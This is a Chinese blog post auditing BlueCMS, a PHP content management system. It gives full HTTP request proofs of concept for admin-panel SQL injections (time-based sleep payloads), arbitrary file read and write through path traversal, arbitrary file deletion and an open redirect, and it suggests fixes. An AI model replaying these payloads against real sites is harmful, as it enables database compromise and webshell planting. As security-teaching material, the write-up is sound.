2、Bluecms代码审计

最新推荐文章于 2024-04-28 22:51:39 发布
最新推荐文章于 2024-04-28 22:51:39 发布
阅读量544 收藏 11
点赞数 7
分类专栏: php代码审计(二) 文章标签: 代码审计 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136451932
版权

一、SQL注入

1、后台本地新闻处删除本地新闻存在sql注入

漏洞条件

● 漏洞url:http://bulucms.com/admin/article.php?act=del&id=(select*from(select%2bsleep(3)union/**/select%2b1)a)
● 漏洞参数:act、id
● 漏洞位置:后台
● 是否存在限制:登录后台
● 是否还有其他条件:act=del

复现

payload:  (select*from(select+sleep(3)union/**/select+1)a)

GET /admin/article.php?act=del&id=(select*from(select%2bsleep(3)union/**/select%2b1)a) HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/index.php?act=menu
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qlq28anq5pcbcprri2gg4fit92
Connection: close

在这里插入图片描述

133行的id是已经强制类型转换了,但是132行的id没有任何过滤

在这里插入图片描述

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

2、后台系统设置-操作日志管理删除处存在sql注入

漏洞条件

● 漏洞url:   http://bulucms.com/admin/admin_log.php-[POST]:checkboxes%5B%5D=%28select%2Afrom%28select%2Bsleep%282%29union%2F%2A%2A%2Fselect%2B1%29a%29&act=del
● 漏洞参数:checkboxes、act
● 漏洞位置:后台
● 是否存在限制:无
● 是否还有其他条件:act=del

复现

payload:(select*from(select+sleep(2)union/**/select+1)a)

POST /admin/admin_log.php HTTP/1.1
Host: bulucms.com
Content-Length: 99
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bulucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/admin_log.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qlq28anq5pcbcprri2gg4fit92
Connection: close

checkboxes%5B%5D=%28select%2Afrom%28select%2Bsleep%282%29union%2F%2A%2A%2Fselect%2B1%29a%29&act=del

在这里插入图片描述

代码

$_POST['checkboxes']判断是数组就键值分离,将值带入sql语句执行,没有任何过滤

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

3、后台常用操作–导航管理–编辑处存在sql注入

漏洞条件

● 漏洞url:http://bulucms.com/admin/nav.php?act=edit&navid=1+or+sleep(0.5)
● 漏洞参数:act、navid
● 是否存在限制:无
● 是否还有其他条件:act=edit

复现

功能位置--常用操作--导航管理--编辑
测试payload:+or+sleep(0.5)

GET /admin/nav.php?act=edit&navid=1+or+sleep(0.5) HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/nav.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1
Connection: close

代码

接受的navid变量是直接拼接在数据库接受的,输入什么就会直接拼接sql查询语句取数据库查,没有任何过滤

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

4、后台分类信息–模型管理–删除处存在sql注入

漏洞条件

● 漏洞url:http://bulucms.com/admin/model.php?act=del&model_id=2+or+sleep(2)
● 漏洞参数:act、model_id
● 是否存在限制:无
● 是否还有其他条件:act=del

复现

GET /admin/model.php?act=del&model_id=2+or+sleep(2) HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/index.php?act=menu
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1
Connection: close

在这里插入图片描述

代码

进入第三个条件语句,要让数据库里有数据才能删除成功,给model_id赋值

在这里插入图片描述

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

5、后台分类信息–附加属性管理–删除存在sql注入

漏洞条件

● 漏洞url: http://bulucms.com/admin/attachment.php?act=del&att_id=2+or+sleep(2)
● 漏洞参数:act、att_id
● 是否存在限制:无
● 是否还有其他条件:act=del

复现

GET /admin/attachment.php?act=del&att_id=2+or+sleep(2) HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/attachment.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1
Connection: close

代码

也是从拼接的sql语句里直接接受的参数变量没有任何过滤

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

6、后台模块管理–广告管理–编辑存在sql注入

漏洞条件

● 漏洞url: http://bulucms.com/admin/ad.php?act=edit&ad_id=3+or+sleep(0.5)
● 漏洞参数:act、ad_id
● 是否存在限制:无
● 是否还有其他条件:act=edit;

复现

GET /admin/ad.php?act=edit&ad_id=3+or+sleep(0.5) HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/ad.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bl3qc9geb0lfhf4luh19ngs7h3
Connection: close

在这里插入图片描述

代码

103行get接受参数ad_id。只判断是否存在值两边去除空没有任何过滤

在这里插入图片描述

修复建议

将用户输入的内容验证和过滤,使用预编译或转义函数。

以及其他功能存在sql注入:
	后台模块管理--电话广告位--编辑--提交更新存在sql注入
	后台模块管理--电话广告位--删除存在sql注入
	后台会员管理--会员列表--编辑存在sql注入
	前台sql注入
	前端注册邮箱处存在sql注入
	前端注册邮箱处存在sql注入
	前端评论留言处存在sql注入

二、文件操作

1、后台任意文件读取

漏洞条件

● 漏洞url: http://bulucms.com/admin/tpl_manage.php?act=edit&tpl_name=../../data/config.php
● 漏洞参数:act、tpl_name
● 漏洞位置:后台
● 是否存在限制:无
● 是否还有其他条件:act=edit

复现

功能位置--系统设置--模板管理--编辑

GET /admin/tpl_manage.php?act=edit&tpl_name=../../data/config.php HTTP/1.1
Host: bulucms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/tpl_manage.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jpimqam7eiq12p051tp1p0ua81
Connection: close

在这里插入图片描述

代码

fopen() 函数打开文件或者 URL。如果打开失败,本函数返回 FALSE。
get方式接受参数,接受一个文件没有过滤../,直接打开

在这里插入图片描述

修复建议

修复任意文件读取漏洞:严格限制用户输入、实施有效的文件路径验证、避免动态拼接用户输入构建文件路径、限制访问权限、定期检查和清理、记录文件访问活动。

2、后台任意文件写入

漏洞条件

● 漏洞url:http://bulucms.com/admin/tpl_manage.php-[POST]:
tpl_content=<?php+phpinfo();?>&tpl_name=../../../3.php&act=do_edit
● 漏洞参数:tpl_content、tpl_name、act
● 漏洞位置:后台
● 是否存在限制:无
● 是否还有其他条件:act=do_edit

复现

功能位置--系统设置--模板管理--编辑提交
直接写一个文件以及有危害的内容

POST /admin/tpl_manage.php HTTP/1.1
Host: bulucms.com
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bulucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/tpl_manage.php?act=edit&tpl_name=ann.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jpimqam7eiq12p051tp1p0ua81
Connection: close

tpl_content=aaaaaaaa&tpl_name=1.php&act=do_edit

在这里插入图片描述

可实现跨目录创建和写入

POST /admin/tpl_manage.php HTTP/1.1
Host: bulucms.com
Content-Length: 72
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bulucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/admin/tpl_manage.php?act=edit&tpl_name=ann.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8jtsuca31sj4t3umsm7o1o6eg7; detail=4
Connection: close

tpl_content=<%3fphp+phpinfo()%3b%3f>&tpl_name=../../../3.php&act=do_edit

在这里插入图片描述

代码

fopen(   ,wb)如果文件存在直接写入,不存在就创建文件

在这里插入图片描述

3、用户后台修改资料处存在任意文件删除

漏洞条件

● 漏洞url: http://bulucms.com/user.php-[POST请求]
● 漏洞参数:face_pic3
● 是否存在限制: 用户需要登录
● 是否还有其他条件:face_pic1为空

复现

POST /user.php HTTP/1.1
Host: bulucms.com
Content-Length: 1479
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bulucms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0q2hPmZueKs7y3Vr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/user.php?act=my_info
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41; detail=4
Connection: close

------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="face_pic1"


------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="face_pic2"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="birthday"

2023-12-03
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="sex"

0
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="email"

222@qq.com
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="msn"

111
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="qq"

222
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="office_phone"

333
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="home_phone"

444
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="mobile_phone"

555
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="address"

666
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="act"

edit_user_info
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="submit"

È·ÈÏÐÞ¸Ä
------WebKitFormBoundary0q2hPmZueKs7y3Vr
Content-Disposition: form-data; name="face_pic3"

2.txt
------WebKitFormBoundary0q2hPmZueKs7y3Vr--

在这里插入图片描述

代码

face_pic1不为空就会上传,为空就直接删除face_pic3接收的变量

在这里插入图片描述

修复建议

限制用户输入、验证和过滤文件路径、避免动态构建用户输入的删除路径、设置合适的文件权限、定期备份和监控文件删除活动。

以及其他三处任意文件删除:
	后台信息管理处存在任意文件删除
	后台友情链接处编辑存在任意文件删除
	用户后台分类信息--发布分类信息存在任意文件删除

三、前端注册处存在url跳转

漏洞条件

● 漏洞url: http://bulucms.com/user.php-[POST]:referer=&user_name=00000&pwd=098765&pwd1=098765&email=qq%40qqqq.com&safecode=bwvy&from=d3d3LmJhaWR1LmNvbQ==&act=do_login
● 漏洞参数:from
● 是否存在限制: from需要base64
● 是否还有其他条件:safecode验证码需要随机获取;act=do_login

复现

POST /user.php HTTP/1.1
Host: bulucms.com
Content-Length: 120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bulucms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bulucms.com/user.php?act=reg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41; detail=2
Connection: close

referer=&user_name=00000&pwd=098765&pwd1=098765&email=qq%40qqqq.com&safecode=bwvy&from=d3d3LmJhaWR1LmNvbQ==&act=do_login

在这里插入图片描述

代码

$from变量不为空,将接受的变量base64编码。其他条件成立就会直接跳到传进来的值

在这里插入图片描述
在这里插入图片描述

修复建议

验证和过滤所有用户提供的重定向 URL,只允许合法的、事先定义好的目标地址。
YINZHE_
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bluecms源码 初级代码审计
07-31
【标题】:“BlueCMS源码 初级代码审计”指的是对BlueCMS 1.6版本的源代码进行安全审查和分析的过程,这是针对初学者的一个学习项目,旨在帮助他们了解和掌握代码审计的基础知识。 【描述】:“BlueCMS 1.6源码 ...
bluecms代码审计入门
qq_42307546的博客
06-27 654
php
BlueCMS漏洞,靶场学习心得(上)
m0_48294281的博客
01-08 4451
靶场学习心得,欢迎交流!
代码审计-熊海CMSv1.0
最新发布
sx____的博客
04-28 414
使用seay代码审计系统进行自动审计,发现有文件包含漏洞、sql注入漏洞和任意文件读取漏洞
BlueCms v1.6 本地文件包含漏洞代码审计
good good study
09-15 5246
目录 BlueCms POC构造 漏洞利用 BlueCms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 POC构造 可以先用代码审计工具如Seay扫一波,或者直接观察代码。如下在user.php中,可以看到,如果act参数为pay值,这包含 'include/payment/'.$_POST['pay']."/index.php" 文件,其中pay参数没有过滤。按道理只要截断一下,
bluecms_v_1.6sp1代码审计
RestoreJustice的博客
03-23 776
这是一个比较古老的cms,可以说是满目疮痍,更靶场一样。上述漏洞主要是前台的。后台同样存在类似或者没有写到的漏洞。由于自己技术有限,就到这。
BlueCMS_v1.6漏洞挖掘——GetShell
渗透测试
09-15 1637
BlueCMS_v1.6漏洞挖掘——GetShell 渗透思路: 1. 进入网站 2. 扫描后台 3. 百度blueCMS相关漏洞(最好是后台) 4. 进入后台 5. 查看是否有上传文件入口 6. 上传一句话木马(如果有类型防护,可以转图片木马) 7. 查看是否有文件包含漏洞 8. 修改指定文件,把木马写进去 9. 菜刀getshell 视频链接 BlueCMSv1.6漏洞GetShell
万变不离其宗-掌控者靶场之bluecms1.6漏洞
cainsoftware的博客
07-26 2524
拿到题 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势 SQL注入位置 http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1 Order by 7 字段长度为7 注入表名payload: ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_sc..
bluecms-zzcms.rar
06-09
"bluecms-zzcms.rar"这个压缩包包含两个流行的开源内容管理系统(CMS)——BlueCMS v1.6 sp1和ZZCMS 8.2的源代码,这两个系统被广泛用于搭建网站,同时也被用作初学者进行代码审计的实例。 **BlueCMS v1.6 sp1** ...
bluecms企业网站源代码
03-16
bluecms介绍: 1、BlueCMS核心程序不超过200K,全部由自定义系统写成,本程序最大的特点就是不用担心升级的问题,所有版本自动升级,所有高级版本标签都兼容低级版本标签 2、支持栏目自定义字段和项目
Bluecms内容管理系统 v1.6sp1
08-29
v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
BlueCMS漏洞大集合
02-03
client_ip伪造注入看代码吧,这里的getip函数是获取Ip的,由于,client_ip和x_forwarded_for都可以伪造。在include/common.fun.php的106行我们继续跟踪一下getip()这个函数的应用。comment.php中的113行这里我们伪造下ip测试下。看看结果可以看到了么?已经是注入了问题这里的是报错是。。它已经单独写出报错的语句,以致我们不能利用报错语句,直接爆出用户名和密码。但是我们可以用盲注的方式进行来搞用户名和密码了。但是这样子太麻烦了。之前,我一直在想啊,想啊,用啥方法来注呢,注,注。。。。。。。毕竟人的思维太宽了。因为这是个inser
【原创】] Bluecms 0day 大集合.docx
11-29
cms 0day 大集合 【原创】] Bluecms 0day 大集合.docx
Bluecms后台任意修改文件getshell
kiwi的博客
10-26 1573
前几天在入门代码审计的时候,拿bluecms学习,偶然在百度上面找到一篇文章是写bluecms拿shell的,就学习了一下,我认为应该有部分cms也存在此漏洞,可能文章有不足的地方欢迎师傅们批评指正。
Blue CMS1.6 SQL注入漏洞
whatiwhere的博客
11-30 2903
实验环境 实验环境 操作机系统:Windows XP 目标网站:172.16.11.2 实验目的 了解本次漏洞形成的原理 掌握此漏洞的利用方法 学会如何去修复此漏洞 实验工具 1.php :本次实验的Payload 实验内容 BlueCMS 是一款国产的CMS平台,十分灵活、方便,早些年广泛的应用于商业系统、个人博客等。 漏洞介绍 程序在使用getip()函数获取客户端ip时没有严格...
文件上传漏洞挖掘实战
qq_66985187的博客
03-04 300
使用burpsuit和蚁剑分析文件上传漏洞,并获取相关信息
SQL注入时间盲注
qq_43936524的博客
03-13 5761
文章目录sqlmap日记溯源实例发现时间盲注构造时间盲注payload编写脚本成功跑出数据库名 sqlmap日记溯源 实例 发现时间盲注 一个实用的时间盲注fuzz payload 在一次测试中,发现一个参数存在时间盲注,fuzz的payload为desc,(select*from(select+sleep(2)union/**/select+1)a),其中(select*from(select+sleep(2)union/**/select+1)a))是检测时间盲注时一个很好用的fuzz payload。
由order by排序注入实战引发的思考【转】
mingyqf的博客
06-03 888
原文链接:https://www.jianshu.com/p/70f83c2be2adYour7Maxx0.092021.04.20 20:03:51字数 1,856阅读 677这个月的业务挖洞成果对自己来说还是很满意的,除了漏洞数量外,漏洞质量也比较高。具体就不多说了,言归正传,在本月的业务渗透测试里发现一个很有趣的sql注入,也是自己之前的一个盲区——order by排序注入,一直想着在实战中接触这种类型的注入场景,还真就来了。话不多说,上接口: 这是一个比较正常的get类型的获取数据接口,但order
bluecms网站搭建
04-09
BlueCMS是一种网站搭建系统,它提供了一个简单而强大的平台,用于创建和管理个人或企业网站。以下是关于BlueCMS网站搭建的一些介绍: 1. 界面友好:BlueCMS拥有直观的用户界面,使得网站搭建变得简单易用。无需编程知识,即可通过拖放、自定义模板等方式创建网站。 2. 多样化的模板:BlueCMS提供了丰富的模板库,包括各种行业和风格的模板,用户可以根据自己的需求选择合适的模板,并进行自定义修改。 3. 强大的功能:BlueCMS提供了许多功能模块,如文章管理、图片库、产品展示、在线留言等,用户可以根据自己的需求选择并添加这些功能模块到自己的网站中。 4. 响应式设计:BlueCMS支持响应式设计,可以自动适应不同设备上的显示效果,使得网站在手机、平板和电脑等不同终端上都能有良好的用户体验。 5. SEO优化:BlueCMS内置了一些SEO优化功能,如自定义URL、关键词优化等,帮助网站在搜索引擎中获得更好的排名。 6. 安全性:BlueCMS采用了一些安全措施,如防止SQL注入、XSS攻击等,保护网站的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值